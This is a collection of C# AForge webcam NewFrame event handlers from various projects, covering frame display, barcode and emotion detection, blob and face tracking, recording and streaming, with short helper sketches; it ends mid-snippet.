void videoSource_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    lock (s)
    {
        this.pictureBox1.Image = (Image)eventArgs.Frame.Clone();
    }
}
private void cam_NewFram(object sender, NewFrameEventArgs eventArgs)
{
    Bitmap bit = (Bitmap)eventArgs.Frame.Clone();
    pictureBoxPic.Image = bit;
    //throw new NotImplementedException();
}
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    // Cast the frame as a Bitmap object and don't forget to use ".Clone()", otherwise
    // you'll probably get access violation exceptions.
    if (start)
    {
        pictureBoxVideo.BackgroundImage = (Bitmap)eventArgs.Frame.Clone();
        var img = (Bitmap)eventArgs.Frame.Clone();
        byte[] byteArray = null;
        count--;
        if (count < 0)
        {
            count = 20;
            using (MemoryStream stream = new MemoryStream())
            {
                img.Save(stream, System.Drawing.Imaging.ImageFormat.Png);
                stream.Close();
                byteArray = stream.ToArray();
            }
            var res = EMO.getEmo(byteArray);
            if (res.Length > 10)
            {
                dynamic data = JsonConvert.DeserializeObject(res);
                lat = "" + data[0].scores.anger;
                lht = "" + data[0].scores.happiness;
                lnt = "" + data[0].scores.neutral;
                lst = "" + data[0].scores.sadness;
                lct = "" + data[0].scores.contempt;
                lft = "" + data[0].scores.fear;
                // Scores that come back in scientific notation are treated as zero.
                if (lat.Contains("E")) { lat = "000"; }
                if (lht.Contains("E")) { lht = "000"; }
                if (lnt.Contains("E")) { lnt = "000"; }
                if (lst.Contains("E")) { lst = "000"; }
                if (lct.Contains("E")) { lct = "000"; }
                if (lft.Contains("E")) { lft = "000"; }
            }
        }
    }
}
void cam_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    // Event handler that shows the frame in the picture box.
    Bitmap bit = (Bitmap)eventArgs.Frame.Clone();
    pbCamera.Image = bit;
}
//------------------------------------------------------------------------------------------------------------------------
private void OnNewFrame(object sender, NewFrameEventArgs eventArgs)
{
    // get new frame
    Bitmap bitmap = eventArgs.Frame;
    if (IsActive)
        OnFrameCaptured(this, new VideoEventArgs(bitmap));
}
void captureDevice_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    using (UnmanagedImage uimage = UnmanagedImage.FromManagedImage(eventArgs.Frame))
    {
        try
        {
            using (Bitmap image = uimage.ToManagedImage())
            {
                IntPtr hBitMap = image.GetHbitmap();
                try
                {
                    BitmapSource bmaps = Imaging.CreateBitmapSourceFromHBitmap(
                        hBitMap, IntPtr.Zero, Int32Rect.Empty, BitmapSizeOptions.FromEmptyOptions());
                    bmaps.Freeze();
                    Dispatcher.Invoke((Action)(() => { pictureBoxMain.Source = bmaps; }), DispatcherPriority.Render, null);
                    process.NewBitmap(image);
                }
                finally
                {
                    DeleteObject(hBitMap);
                }
            }
        }
        catch (Exception ex)
        {
            ex.ToString();
        }
    }
}
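The DeleteObject call above depends on a GDI interop declaration that is not shown in the snippet; a minimal sketch of that P/Invoke, assuming it lives in the same class, could be:

// Hypothetical P/Invoke declaration assumed by the handler above; releases the GDI handle
// returned by Bitmap.GetHbitmap() so the process does not leak GDI objects.
[System.Runtime.InteropServices.DllImport("gdi32.dll")]
private static extern bool DeleteObject(IntPtr hObject);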
void controller_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    if (!backproj)
    {
        Bitmap image = eventArgs.Frame;
        if (image == null)
            return;
        if (parent.faceForm != null && !parent.faceForm.IsDisposed)
        {
            MatchingTracker matching = parent.faceForm.faceController.Tracker as MatchingTracker;
            Rectangle rect = new Rectangle(
                matching.TrackingObject.Center.X,
                0,
                image.Width - matching.TrackingObject.Center.X,
                matching.TrackingObject.Center.Y);
            rect.Intersect(new Rectangle(0, 0, image.Width, image.Height));
            marker.Rectangles = new[] { matching.TrackingObject.Rectangle };
            image = marker.Apply(image);
        }
        pictureBox.Image = image;
    }
}
void NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    Bitmap bmp = eventArgs.Frame;
    int index = Array.IndexOf(camIds, ((VideoCaptureDevice)sender).Source);
    switch (index)
    {
        case 0: Dispatcher.Invoke(() => cam1Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 1: Dispatcher.Invoke(() => cam2Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 2: Dispatcher.Invoke(() => cam3Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 3: Dispatcher.Invoke(() => cam4Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 4: Dispatcher.Invoke(() => cam5Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 5: Dispatcher.Invoke(() => cam6Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 6: Dispatcher.Invoke(() => cam7Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 7: Dispatcher.Invoke(() => cam8Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
        case 8: Dispatcher.Invoke(() => cam9Image.Source = (ImageSource)converter.Convert(bmp, null, null, null)); break;
    }
}
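This handler (and the MJPEG handler further down) routes each frame through a converter object whose implementation is not shown. A plausible sketch of such a Bitmap-to-ImageSource converter, with the same four-argument Convert signature as WPF's IValueConverter, is given below; the class name and its internals are assumptions, not the original project's code.

// Hypothetical converter assumed by the handlers above; turns a GDI+ Bitmap into a WPF ImageSource.
public sealed class BitmapToImageSourceConverter
{
    [System.Runtime.InteropServices.DllImport("gdi32.dll")]
    private static extern bool DeleteObject(IntPtr hObject);

    public object Convert(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture)
    {
        var bitmap = (System.Drawing.Bitmap)value;
        IntPtr hBitmap = bitmap.GetHbitmap();
        try
        {
            return System.Windows.Interop.Imaging.CreateBitmapSourceFromHBitmap(
                hBitmap, IntPtr.Zero, System.Windows.Int32Rect.Empty,
                System.Windows.Media.Imaging.BitmapSizeOptions.FromEmptyOptions());
        }
        finally
        {
            DeleteObject(hBitmap); // release the GDI handle to avoid leaking GDI objects
        }
    }
}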
private void video_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    // get new frame
    Bitmap bitmap = eventArgs.Frame;
    Bitmap imediateDraw = new Bitmap(bitmap, new Size(pictureBox2.Width, pictureBox2.Height));
    pictureBox2.Invoke((Action)delegate()
    {
        if (pictureBox2.Image != null)
        {
            pictureBox2.Image.Dispose();
        }
        pictureBox2.Image = imediateDraw;
    });
    Bitmap clone = new Bitmap(bitmap.Width, bitmap.Height, System.Drawing.Imaging.PixelFormat.Format24bppRgb);
    using (Graphics gr = Graphics.FromImage(clone))
    {
        gr.DrawImage(bitmap, new Point(0, 0));
    }
    processor.Image = clone;
    bitmap.Dispose();
}
private void _videoCaptureDevice_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone();
    CameraFrameEventArgs args = new CameraFrameEventArgs(bitmap);
    OnCameraFrame(args);
    bitmap.Dispose();
}
private void video_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    // get new frame
    pictureBox1.Image = (Bitmap)eventArgs.Frame.Clone();
    // process the frame
}
void FinalVideo_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    Icon newIcon = new Icon(@"c:\users\gregster\documents\visual studio 2012\Projects\WebCamTrack\WebCamTrack\bin\Debug\favicon.ico");
    BlobCounter bc = new BlobCounter();
    EuclideanColorFiltering filter = new EuclideanColorFiltering();
    Bitmap video = (Bitmap)eventArgs.Frame.Clone();   // unfiltered image
    Bitmap video1 = (Bitmap)eventArgs.Frame.Clone();  // image with the filter applied
    // filter.CenterColor = new RGB(0, 0, 0);
    filter.Radius = 100;
    filter.ApplyInPlace(video1); // apply the filter
    bc.MinWidth = 5;
    bc.MinHeight = 5;
    bc.FilterBlobs = true;
    // bc.ObjectsOrder = ObjectsOrder.Size;
    bc.ProcessImage(video1); // process the already filtered image to identify objects
    Rectangle[] rects = bc.GetObjectsRectangles();
    foreach (Rectangle recs in rects)
        if (rects.Length > 0)
        {
            Rectangle objectRect = rects[0];
            Graphics g = Graphics.FromImage(video); // mark objects found via the filtered image
            Graphics h = Graphics.FromImage(video1);
            using (Pen pen = new Pen(Color.FromArgb(160, 255, 160), 5))
            {
                g.DrawIcon(newIcon, objectRect);
                // g.DrawRectangle(pen, objectRect);
                h.DrawRectangle(pen, objectRect);
            }
            g.Dispose();
            h.Dispose();
        }
    pictureBox1.Image = video;
    pictureBox2.Image = video1;
}
// Handler for the NewFrame event of videoCaptureDevice.
private void VideoCaptureDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    if (_reader.ActivateBool)
    {
        // Get the image from eventArgs.
        Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone();
        // Scan the image for a barcode.
        string barcode = _reader.GetBarcode(bitmap);
        // If a barcode was found...
        if (barcode != null)
        {
            BarcodeFound(new BarcodeFoundEventArgs { Barcode = barcode });
            _reader.Deactivate();
            _timer.Enable();
        }
        // Invoke a new action on the main thread, because the camera uses its own thread.
        Application.Current.Dispatcher.BeginInvoke(new Action(() => { CameraFeed = Convert(bitmap); }));
        Application.Current.Dispatcher.BeginInvoke(new Action(() => { CameraFeed.Freeze(); }));
    }
}
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    try
    {
        BitmapImage bi;
        using (var bitmap = (Bitmap)eventArgs.Frame.Clone())
        {
            bi = bitmap.ToBitmapImage();
            if (snap)
            {
                // Setting the folder for pulling up the image already saved (in the assets folder).
                var imagePath = System.IO.Path.Combine(root, "../../Evaluated/");
                string cameraPic = imagePath + "evaluated.jpg";
                bitmap.Save(cameraPic);
                snap = false;
            }
        }
        bi.Freeze(); // avoid cross-thread operations and prevent leaks
        Dispatcher.BeginInvoke(new ThreadStart(delegate { videoPlayer.Source = bi; }));
    }
    catch (Exception exc)
    {
        MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
        StopCamera();
    }
}
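Several of these WPF handlers call a ToBitmapImage() extension on System.Drawing.Bitmap that is not part of the framework; a minimal sketch of such a helper, assuming the usual PresentationCore/WindowsBase references, might look like this:

// Hypothetical extension assumed by the WPF handlers in this list; converts a GDI+ Bitmap
// to a WPF BitmapImage by round-tripping through an in-memory stream.
public static class BitmapExtensions
{
    public static System.Windows.Media.Imaging.BitmapImage ToBitmapImage(this System.Drawing.Bitmap bitmap)
    {
        using (var ms = new System.IO.MemoryStream())
        {
            bitmap.Save(ms, System.Drawing.Imaging.ImageFormat.Bmp);
            ms.Position = 0;
            var bi = new System.Windows.Media.Imaging.BitmapImage();
            bi.BeginInit();
            bi.CacheOption = System.Windows.Media.Imaging.BitmapCacheOption.OnLoad; // copy the pixels before the stream is disposed
            bi.StreamSource = ms;
            bi.EndInit();
            return bi;
        }
    }
}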
void device_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap shoot = eventArgs.Frame.Clone() as Bitmap;
    try
    {
        frameCounter++;
        if (frameCounter > 10)
        {
            invoices = invoiceProcess.GetInvoiceCollection(shoot);
            frameCounter = 0;
        }
        if (invoices != null && invoices.Count > 0)
        {
            // Draw a rectangle around each card and write the card string on it.
            using (Graphics graph = Graphics.FromImage(shoot))
            {
                foreach (Invoice invoice in invoices)
                {
                    graph.DrawPolygon(pen, invoice.Corners); // draw a polygon around the card
                    PointF point = invoiceProcess.GetStringPoint(invoice.Corners); // find the top-left corner
                    point.Y += 10;
                    graph.DrawString(invoice.Code == null ? "" : invoice.Code, font, Brushes.Lime, point); // write the string on the card
                }
            }
        }
    }
    catch (Exception ex)
    {
        File.AppendAllText("e:\\error.txt", ex.Message);
        throw;
    }
    pb_Cinema.Image = ResizeShoot(shoot);
}
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    System.Drawing.Bitmap bmp = (System.Drawing.Bitmap)eventArgs.Frame.Clone();
    string fullPath = g_Path + "temp\\";
    if (!Directory.Exists(fullPath))
    {
        Directory.CreateDirectory(fullPath);
    }
    // saved = saved++;
    string img = fullPath + "temp" + saved + ".jpeg";
    //try
    //{
    Stream imageFileStream = File.Open(img, FileMode.OpenOrCreate, FileAccess.ReadWrite);
    bmp.Save(imageFileStream, System.Drawing.Imaging.ImageFormat.Jpeg);
    imageFileStream.Flush();
    imageFileStream.Close();
    imageFileStream.Dispose();
    //}
    //catch (Exception) { ; }
    flag = true;
    imageFilePath = img;
    Console.WriteLine(imageFilePath);
    videoSource.NewFrame -= new NewFrameEventHandler(videoSource_NewFrame);
}
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    try
    {
        BitmapImage bi;
        using (var frame = (Bitmap)eventArgs.Frame.Clone())
        {
            var width = frame.Width;
            var height = frame.Height;
            // try overlay
            Bitmap bitmapResult = new Bitmap(width, height, frame.PixelFormat);
            Graphics g = Graphics.FromImage(bitmapResult);
            g.DrawImage(frame, 0, 0, width, height);
            // apply raster
            g.DrawImage(_raster, 0, 0, width, height);
            // apply logo
            //g.DrawImage(_logo, width - 175, 25, 150, 121);
            bi = bitmapResult.ToBitmapImage();
            // TODO: Add frame to some output video stream
        }
        bi.Freeze(); // avoid cross-thread operations and prevent leaks
        Dispatcher.BeginInvoke(new ThreadStart(delegate { imgPreview.Source = bi; }));
    }
    catch (Exception exc)
    {
        MessageBox.Show("Error on _videoSource_NewFrame:\n" + exc.Message, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
        StopCamera();
    }
}
private void FinalVideoSource_NewFrame2(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap image = (Bitmap)eventArgs.Frame.Clone();
    if (detector.ProcessFrame(image) > 1)
    {
        pictureBox1.Image = image;
    }
    pictureBox1.Image = image;
    int X = 0;
    int Y = 0;
    try
    {
        BlobCountingObjectsProcessing countingDetector = (BlobCountingObjectsProcessing)detector.MotionProcessingAlgorithm;
        foreach (Rectangle rect in countingDetector.ObjectRectangles)
        {
            X += rect.X;
            Y += rect.Y;
        }
        SumX = X / countingDetector.ObjectRectangles.Length;
        SumY = Y / countingDetector.ObjectRectangles.Length;
    }
    catch (Exception e)
    {
        Console.WriteLine(e.Message);
    }
}
/// <summary>
/// New frame handler.
/// </summary>
/// <param name="sender"></param>
/// <param name="eventArgs"></param>
private void videoDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    lock (this.syncLockVideo)
    {
        // Dispose last frame.
        if (this.capturedImage != null)
        {
            this.capturedImage.Dispose();
            this.capturedImage = null;
        }
        // Clone the resized content.
        if ((this.pbCamera.Size.Width > 1 && this.pbCamera.Size.Height > 1) && this.WindowState != FormWindowState.Minimized)
        {
            this.capturedImage = Utils.ResizeImage((Bitmap)eventArgs.Frame.Clone(), this.pbCamera.Size);
        }
        // Exit if there is a problem with data cloning.
        if (this.capturedImage == null)
        {
            return;
        }
        this.ProcessImage(this.capturedImage);
    }
}
private void videoNewFrame(object sender, NewFrameEventArgs args)
{
    Bitmap temp = args.Frame.Clone() as Bitmap;
    try
    {
        frameCounter++;
        if (frameCounter > 10)
        {
            cards = recognizer.Recognize(temp);
            frameCounter = 0;
        }
        // Draw a rectangle around each card and write the card string on it.
        using (Graphics graph = Graphics.FromImage(temp))
        {
            foreach (Card card in cards)
            {
                graph.DrawPolygon(pen, card.Corners); // draw a polygon around the card
                PointF point = CardRecognizer.GetStringPoint(card.Corners); // find the top-left corner
                point.Y += 10;
                graph.DrawString(card.ToString(), font, Brushes.White, point); // write the string on the card
            }
        }
    }
    catch
    {
    }
    this.pictureBox1.Image = ResizeBitmap(temp);
}
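The ResizeBitmap / ResizeShoot helpers used by this handler and the invoice handler above are not shown in the snippets; a plausible sketch, assuming the target size comes from the displaying PictureBox, could be:

// Hypothetical resize helper assumed by the handlers above; scales a frame to the display size.
private Bitmap ResizeBitmap(Bitmap source)
{
    var resized = new Bitmap(pictureBox1.Width, pictureBox1.Height);
    using (Graphics g = Graphics.FromImage(resized))
    {
        g.InterpolationMode = System.Drawing.Drawing2D.InterpolationMode.HighQualityBicubic;
        g.DrawImage(source, 0, 0, resized.Width, resized.Height);
    }
    return resized;
}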
void cam_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    //pictureBox1.Image = (Bitmap)eventArgs.Frame.Clone();
    Bitmap sourceImage = (Bitmap)eventArgs.Frame.Clone();
    pictureBox1.Image = ApplyRGBFilter(sourceImage); // apply the filter and show the result in the picture box
}
void cam_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    video1 = (Bitmap)eventArgs.Frame.Clone();
    video2 = (Bitmap)eventArgs.Frame.Clone();
    bool isChecked = radioButton1.Checked;
    if (isChecked)
    {
        trackBar3.Enabled = true;
        trackBar4.Enabled = true;
        trackBar5.Enabled = true;
        trackBar6.Enabled = true;
        trackBar7.Enabled = true;
        trackBar8.Enabled = true;
        Rgb_obj.ApplyRGB(video2, minR, maxR, minG, maxG, minB, maxB); // apply RGB filter
    }
    else
    {
        FACE_DECTECTION.Face_Detection(video2); // apply face detection filter
    }
    grayScale_Image = gray_obj.Apply_grayscale(video2); // apply grayscale filter
    Blob_Detection.blob_setter(video1, grayScale_Image, 10, 10);
    pictureBox1.Image = video2;
    pictureBox2.Image = video1;
}
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    log.Debug("videoSource_NewFrame: Received a frame from the File video source");
    lock (InstanceImageDispose)
    {
        // log.Debug("videoSource_NewFrame: Considering disposal of previous Images");
        if (InstanceGray != null)
        {
            // log.Debug("videoSource_NewFrame: Disposing of previous Gray frame");
            InstanceGray.Dispose();
            InstanceGray = null;
        }
        else
        {
            // log.Debug("videoSource_NewFrame: No InstanceGray exists, no need to Dispose of it");
        }
    }
    log.Debug("videoSource_NewFrame: Converting to a new Gray");
    // InstanceGray = new Image<Gray, byte>((Bitmap)eventArgs.Frame.Clone());
    InstanceGray = new Image<Gray, byte>((Bitmap)eventArgs.Frame);
    log.Debug("videoSource_NewFrame: Finished converting to a new Gray");
    // notify about the new frame
    log.Debug("videoSource_NewFrame: Built Raising NewFrame event");
    ImageEventArgs imageEventArgs = new ImageEventArgs(InstanceGray);
    OnRaiseCustomEvent(imageEventArgs);
    log.Debug("videoSource_NewFrame: Event complete");
}
// Event handler invoked when a new frame is ready.
private void Video_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    cameraImage = (Bitmap)eventArgs.Frame.Clone();
    // do processing here
}
private void mjpegSource_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    ImageSource IS = (ImageSource)converter.Convert(eventArgs.Frame, null, null, null);
    IS.Freeze();
    Dispatcher.BeginInvoke(new ThreadStart(delegate
    {
        videoImage.Source = IS;
        IS = null;
    }));
}
private void Frame_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    try
    {
        ptxWebCam.Image = (Image)eventArgs.Frame.Clone();
    }
    catch (Exception ex)
    {
    }
}
private void webCam_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    pictureBox1.BackgroundImage = (Bitmap)eventArgs.Frame.Clone();
    if (saveVideo != null)
    {
        saveVideo.AddFrame((Bitmap)eventArgs.Frame.Clone());
    }
}
private void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap newBmp;
    newBmp = (Bitmap)eventArgs.Frame; // receive the new frame from the webcam as a Bitmap
    latestBmp = CopyBMP(newBmp);
    bitmapFlag = true;
}
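CopyBMP is a helper this snippet defines elsewhere; a minimal sketch that deep-copies the frame so the handler does not keep a reference to the buffer the video source reuses might look like this (the method body is an assumption):

// Hypothetical deep-copy helper assumed by the handler above; redraws the source into a
// fresh 24bpp bitmap so the original frame buffer can be reused by the video source.
private static Bitmap CopyBMP(Bitmap source)
{
    var copy = new Bitmap(source.Width, source.Height, System.Drawing.Imaging.PixelFormat.Format24bppRgb);
    using (Graphics g = Graphics.FromImage(copy))
    {
        g.DrawImage(source, 0, 0, source.Width, source.Height);
    }
    return copy;
}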
private void camNewFrame(object sender, NewFrameEventArgs args)
{
    lock (imgLock)
    {
        currentFrame = (Bitmap)args.Frame.Clone();
        imageAvailable = true;
    }
}
private void NewFrameHandler(object sender, NewFrameEventArgs eventArgs)
{
    Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone();
    FastBitmap sobelBitmap = new FastBitmap(bitmap);
    FastBitmap fastBitmap = new FastBitmap(bitmap);
    Harries dummy = new Harries();
    byte[] gray = fastBitmap.GrayPixels;
    var ps = dummy.Corner(gray, fastBitmap.Width, fastBitmap.Height);
    int r = 1;
    var size = new Size(r, r);
    foreach (Point p in ps)
    {
        using (Graphics g = Graphics.FromImage(bitmap))
        {
            g.DrawRectangle(Pens.Coral, new System.Drawing.Rectangle(p, size));
        }
    }
    //for (int i = 0; i < filters.Length; i++)
    //{
    //    filters[0].DoFilter(fastBitmap);
    //}
    //Parallel.For(0, fastBitmap.Width, i =>
    //{
    //    for (int j = 0; j < fastBitmap.Height; j++)
    //    {
    //        int difference = notModifiedBitmap[i, j] - fastBitmap[i, j];
    //        fastBitmap[i, j] = difference > 0 ? (byte)difference : (byte)0;
    //    }
    //});
    List<System.Drawing.Rectangle> result = detector.getElements(fastBitmap, 1, 1.25f, 0.1f, 2, defaultRect);
    foreach (System.Drawing.Rectangle rect in result)
    {
        System.Drawing.Rectangle nRect = rect;
        nRect.Height /= 2;
        List<System.Drawing.Rectangle> eyeResult = eyeDetector.getElements(fastBitmap, 1, 1.25f, 0.1f, 1, nRect);
        using (Graphics g = Graphics.FromImage(bitmap))
        {
            if (eyeResult.Count > 1)
            {
                filters[1].DoFilter(sobelBitmap);
                SobelDetektor det = (SobelDetektor)filters[1];
                g.DrawRectangles(Pens.Blue, eyeResult.ToArray());
                foreach (var eye in eyeResult)
                {
                    System.Drawing.Rectangle pupil = searcher.FindPupil(sobelBitmap, eye, det.Angulars);
                    g.DrawEllipse(Pens.Red, pupil);
                }
            }
        }
    }
    using (Graphics g = Graphics.FromImage(bitmap))
    {
        if (result.Count > 0)
            g.DrawRectangles(Pens.GreenYellow, result.ToArray());
    }
    pictureBox1.Image = bitmap;
}
void screenSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    //Cast the frame as Bitmap object and don't forget to use ".Clone()" otherwise
    //you'll probably get access violation exceptions
    Bitmap bm = (Bitmap)eventArgs.Frame.Clone();
    Dispatcher.BeginInvoke(new UpdateUserScreenCallback(UpdateSceernSource), new object[] { bm });
}
void _device_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    Bitmap bmp = eventArgs.Frame;
    FoundColorSpaces colorSpaces = ColorSpaceFinder.Find(bmp);
    FoundBlobs foundBlobs = BlobFinder.Find(colorSpaces, 80, 25, 90, 50, 1.2, 2.2);
    foreach (Blob blob in foundBlobs.Blobs)
    {
        Bitmap correctedBlobBitmap = ColorSpaceFinder.FindColorCorrectedForBlob(colorSpaces, blob);
        ColorTypeEnum color = ColorSpaceFinder.FindShapeColor(correctedBlobBitmap, _red, _green, _purple);
        System.Drawing.Pen pen = null;
        switch (color)
        {
            case ColorTypeEnum.Green:
                pen = new System.Drawing.Pen(System.Drawing.Brushes.Green, 5);
                break;
            case ColorTypeEnum.Red:
                pen = new System.Drawing.Pen(System.Drawing.Brushes.Red, 5);
                break;
            case ColorTypeEnum.Purple:
                pen = new System.Drawing.Pen(System.Drawing.Brushes.Purple, 5);
                break;
            case ColorTypeEnum.Unknown:
                pen = new System.Drawing.Pen(System.Drawing.Brushes.Yellow, 5);
                break;
        }
        using (Graphics g = Graphics.FromImage(bmp))
        {
            g.DrawRectangle(pen, blob.Rectangle);
        }
    }
    BitmapData bmd = bmp.LockBits(
        new System.Drawing.Rectangle(0, 0, bmp.Width, bmp.Height),
        ImageLockMode.ReadWrite,
        bmp.PixelFormat);
    byte[] bytes = new byte[bmd.Stride * bmd.Height];
    Marshal.Copy(bmd.Scan0, bytes, 0, bytes.Length);
    bmp.UnlockBits(bmd); // release the lock once the pixel data has been copied
    Dispatcher.Invoke((Action)delegate()
    {
        if (_bmp == null)
        {
            _bmp = new WriteableBitmap(bmp.Width, bmp.Height, 96, 96, PixelFormats.Bgr24, null);
            VideoWindow.Source = _bmp;
        }
        _bmp.WritePixels(new Int32Rect(0, 0, bmp.Width, bmp.Height), bytes, bmd.Stride, 0);
    });
    return;
}
void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap bmp = (Bitmap)eventArgs.Frame.Clone();
    frame_rgb = new Image<Bgr, byte>(bmp);
    frame_rgb = GetStandandSize(frame_rgb);
    CvInvoke.cvFlip(frame_rgb.Ptr, IntPtr.Zero, FLIP.HORIZONTAL);
    DispatchImage.Instance.Dispath(frame_rgb.Copy());
}
void localSource_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    byte[] jpegImage = Bitmap2JpegArray(eventArgs.Frame);
    Dispatcher.Invoke(() => primaryImageBox.Source = ByteImageConverter.ByteToImage(jpegImage));
    string sizeString = "SIZE:" + jpegImage.Length + "Z";
    byte[] startMessage = Encoding.ASCII.GetBytes(sizeString);
    clientSocket.Send(startMessage, startMessage.Length, SocketFlags.None);
    clientSocket.Send(jpegImage, jpegImage.Length, SocketFlags.None);
}
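Bitmap2JpegArray (also used by the UDP sender further down) is a helper defined elsewhere in those projects; a minimal sketch, assuming plain JPEG encoding at default quality, could be:

// Hypothetical JPEG-encoding helper assumed by the network-streaming handlers; saves the
// frame into a memory stream and returns the encoded bytes.
private static byte[] Bitmap2JpegArray(System.Drawing.Bitmap frame)
{
    using (var ms = new System.IO.MemoryStream())
    {
        frame.Save(ms, System.Drawing.Imaging.ImageFormat.Jpeg);
        return ms.ToArray();
    }
}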
private void VideoCaptureDevice_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    Bitmap bitmap = (Bitmap)eventArgs.Frame.Clone();
    BarcodeReader reader = new BarcodeReader();
    var result = reader.Decode(bitmap);
    if (result != null)
    {
        textBox1.Invoke(new MethodInvoker(delegate() { textBox1.Text = result.ToString(); }));
        SoundPlayer player = new SoundPlayer("Data\\scanner.wav");
        player.Play();
        if (result.ToString() == "4356-3964")
        {
            // Create a new string array called 'arr' with four entries.
            string[] arr = new string[4];
            // Set the first one to the item name.
            arr[0] = "Strawberry Macaron";
            // Set the second one to the price.
            arr[1] = "3";
            // Set the third one to the quantity.
            arr[2] = "1";
            // Set the last one to the total.
            arr[3] = "3";
            // Create a ListViewItem called 'lvi' from the 'arr' array.
            ListViewItem lvi = new ListViewItem(arr);
            // Add the 'lvi' item to the list view.
            lvItems.Invoke(new MethodInvoker(delegate() { lvItems.Items.Add(lvi); }));
            // Add the item total to the sub total.
            tbSubTotal.Invoke(new MethodInvoker(delegate() { tbSubTotal.Text = (Convert.ToInt32(tbSubTotal.Text) + Convert.ToInt32("3")).ToString(); }));
        }
        if (videoCaptureDevice != null)
        {
            if (videoCaptureDevice.IsRunning)
            {
                videoCaptureDevice.SignalToStop();
            }
        }
    }
    pictureBox1.Image = bitmap;
}
private void FinalFrame_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    try
    {
        picVideo.Image = (Bitmap)eventArgs.Frame.Clone();
    }
    catch (Exception ex)
    {
        MessageBox.Show(ex.Message);
    }
}
private void newFrameEvent(object sender, NewFrameEventArgs eventArgs)
{
    DateTime currentTime = DateTime.Now;
    Graphics graphics = Graphics.FromImage(eventArgs.Frame);
    // "MM" is the month and "HH" the 24-hour clock; lowercase "mm"/"hh" would print minutes in the date and a 12-hour value.
    TextRenderer.DrawText(graphics, currentTime.ToString("dd/MM/yyyy HH:mm:ss"), font, new Point(5, 5), Color.White, Color.Black);
    if (recorder != null)
    {
        recorder.AddFrame(eventArgs.Frame);
    }
}
private void videoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs e)
{
    double ellapsed = frameStopwatch.ElapsedMilliseconds;
    if (frameStopwatch.IsRunning)
    {
        lock (averageFramePeriod)
            averageFramePeriod.Enqueue(ellapsed);
    }
    frameStopwatch.Restart();
    InvokeNewFrame(e.Frame);
}
void _videoSource_NewFrame(object sender, NewFrameEventArgs eventArgs)
{
    if (!_takePicture)
        return;
    if (eventArgs.Frame.Width == 0)
    {
        return;
    }
    _frame = eventArgs.Frame.Clone() as Bitmap;
    _videoSource.SignalToStop();
}
void novoFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    // Get the frame as a Bitmap via ".Clone()".
    if (bitmapsQueue.Count <= 5)
    {
        auxBitmap = (Bitmap)eventArgs.Frame.Clone();
        bitmapsQueue.Add((Bitmap)eventArgs.Frame.Clone());
        bitmapsCanUse.Add(true);
        queueCount++;
    }
    canUse = true;
}
private void VideoSource_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    if (eventArgs.Frame != null)
    {
        Bitmap bmp = (Bitmap)eventArgs.Frame.Clone();
        Rectangle bmpRect = new Rectangle(0, 0, bmp.Width, bmp.Height);
        System.Drawing.Imaging.BitmapData bmpData = bmp.LockBits(bmpRect, System.Drawing.Imaging.ImageLockMode.ReadWrite, bmp.PixelFormat);
        AForge.Imaging.Drawing.Rectangle(bmpData, new Rectangle(10, 10, 100, 100), Color.Green);
        bmp.UnlockBits(bmpData);
        pictureBox1.Image = bmp;
    }
}
/// <summary>
/// Frame received callback.
/// </summary>
/// <param name="sender"></param>
/// <param name="eventArgs"></param>
private void video_NewFrame(object sender, AForge.Video.NewFrameEventArgs eventArgs)
{
    try
    {
        BitmapImage bi;
        using (var bitmap = (Bitmap)eventArgs.Frame.Clone())
        {
            // Here we choose what image to display.
            if (ColorFiltered)
            {
